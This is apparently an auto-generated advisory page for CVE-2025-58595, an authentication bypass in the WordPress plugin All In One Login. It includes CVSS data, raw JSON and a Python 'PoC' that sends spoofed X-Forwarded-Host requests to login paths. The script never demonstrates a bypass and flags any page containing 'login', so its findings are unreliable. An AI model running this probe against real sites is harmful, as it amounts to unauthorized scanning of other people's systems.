Security Vulnerability Report
中文
CVE-2025-58595 CVSS 5.3 MEDIUM

CVE-2025-58595

Published: 2025-11-06 16:15:59
Last Modified: 2026-04-29 10:16:51

Description

Authentication Bypass by Spoofing vulnerability in Saad Iqbal All In One Login change-wp-admin-login allows Identity Spoofing.This issue affects All In One Login: from n/a through <= 2.0.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

All In One Login <= 2.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58595 PoC - WordPress All In One Login Authentication Bypass # Affected: All In One Login Plugin <= 2.0.8 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-58595 """ # Remove trailing slash target_url = target_url.rstrip('/') # Try to access the modified admin login page # The plugin changes default login URL, default is /login or similar paths_to_try = ['/login', '/admin-login', '/wp-admin', '/wp-login.php'] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Referer': target_url, 'X-Forwarded-Host': target_url.replace('https://', '').replace('http://', '') } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-58595 - All In One Login Authentication Bypass") for path in paths_to_try: url = f"{target_url}{path}" try: response = requests.get(url, headers=headers, timeout=10, allow_redirects=False) print(f"\n[?] Testing path: {path}") print(f" Status: {response.status_code}") # Check for signs of vulnerability if response.status_code in [200, 302, 301] and 'login' in response.text.lower(): print(f" [!] Potential vulnerable endpoint found: {url}") print(f" [!] Plugin may allow authentication bypass via spoofing") except requests.RequestException as e: print(f" [x] Error accessing {url}: {e}") print("\n[*] Note: Manual verification required") print("[*] Check if authentication can be bypassed via identity spoofing") print("[*] Recommendation: Upgrade to All In One Login >= 2.0.9") if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58595", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:59.233", "lastModified": "2026-04-29T10:16:51.083", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass by Spoofing vulnerability in Saad Iqbal All In One Login change-wp-admin-login allows Identity Spoofing.This issue affects All In One Login: from n/a through <= 2.0.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/change-wp-admin-login/vulnerability/wordpress-all-in-one-login-plugin-2-0-8-bypass-vulnerability-vulnerability?_s_id=cve", "source": "[email protected]"}]}}